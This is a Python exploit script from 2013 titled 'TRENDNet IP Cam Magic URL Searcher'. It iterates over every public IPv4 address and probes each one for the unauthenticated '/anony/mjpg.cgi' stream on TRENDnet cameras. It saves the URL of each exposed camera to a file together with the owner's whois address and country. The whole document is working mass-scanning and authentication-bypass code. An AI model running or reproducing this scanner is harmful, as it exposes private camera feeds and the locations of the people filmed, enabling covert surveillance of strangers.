# Exploit Title: TRENDNet IP Cam Magic URL Searcher. # Date: [10/04/2013] # Author: [SnakingMax] # Website: http://snakingmax.blogspot.com/ # Category: [Remote Exploit] # Vulnerability description: # Bypass the TRENDNet IP Cam authentication protection by ussing a magic url ^.^ # # Software Description: # This software scans Internet to find TRENDNet IP vulnerable cams. from struct import * from socket import * from http.client import HTTPConnection import urllib.request import subprocess def isPublicIP(ip): #This method responses True if is a public IP or False in otherwise. f = unpack('!I',inet_pton(AF_INET,ip))[0] private = (["127.0.0.0","255.0.0.0"],["192.168.0.0","255.255.0.0"],["172.16.0.0","255.240.0.0"],["10.0.0.0","255.0.0.0"]) for net in private: mask = unpack('!I',inet_aton(net[1]))[0] p = unpack('!I',inet_aton(net[0]))[0] if (f & mask) == p: return False return True def isPublicWebcam(ip): #This method responses True if the IP is a webcam or False in otherwise. try: conn = HTTPConnection(ip, 80, timeout=5) conn.request('GET', "/anony/mjpg.cgi") response = conn.getresponse() if (response.info()["content-type"] == 'multipart/x-mixed-replace;boundary=myboundary'): response.close() conn.close() return True response.close() conn.close() return False except Exception as E: return False response.close() conn.close() def addThisCamToMyList(camIP): #This method save data into a file called CamList.txt camlist = open("CamList.txt", "at") camlist.write("------------------------WEBCAM------------------------\n") #Saving URL. camlist.write(" URL: http://"+camIP+"/anony/mjpg.cgi\n") #Getting and writting whois Information about the cam ip. whoisInfo = subprocess.check_output(["whois", camIP]) whoisList = str(whoisInfo).split("\\n") #Getting and writting address information. for i in whoisList: if (i.count("address")>0): camlist.write(" ADDRESS:\n") camlist.write(i[8:]+"\n") #Getting and writting country Information. for i in whoisList: if (i.count("country")>0): camlist.write(" COUNTRY:\n") print(i[:8]+"\n") break camlist.write("------------------------------------------------------\n") camlist.close() if ( (__name__)=="__main__" ): #Generating IP address. for a in reversed(range(256)): for b in reversed(range(256)): for c in reversed(range(256)): for d in range(1,255): generatedIP = str(a)+"."+str(b)+"."+str(c)+"."+str(d) #Check if generated IP is public. if(isPublicIP(generatedIP)): print("Testing IP: "+generatedIP) #Check if the IP is a webcam. if (isPublicWebcam(generatedIP)): print(generatedIP + " is a webcam ;-)") #Saving data about the camera into a file. addThisCamToMyList(generatedIP) # ____ _ _ __ __ # / ___| _ __ __ _| | _(_)_ __ __ _| \/ | __ ___ __ # \___ \| '_ \ / _` | |/ / | '_ \ / _` | |\/| |/ _` \ \/ / # ___) | | | | (_| | <| | | | | (_| | | | | (_| |> < ____ # ____|____/|_| |_|\__,_|_|\_\_|_| |_|\__, |_| |_|\__,_/_/\_\__/ O \___/ # <\x41\x41\x41\x41\x41\x41\x41\x41\x41|___/\x41\x41\x41\x41\x41______/ \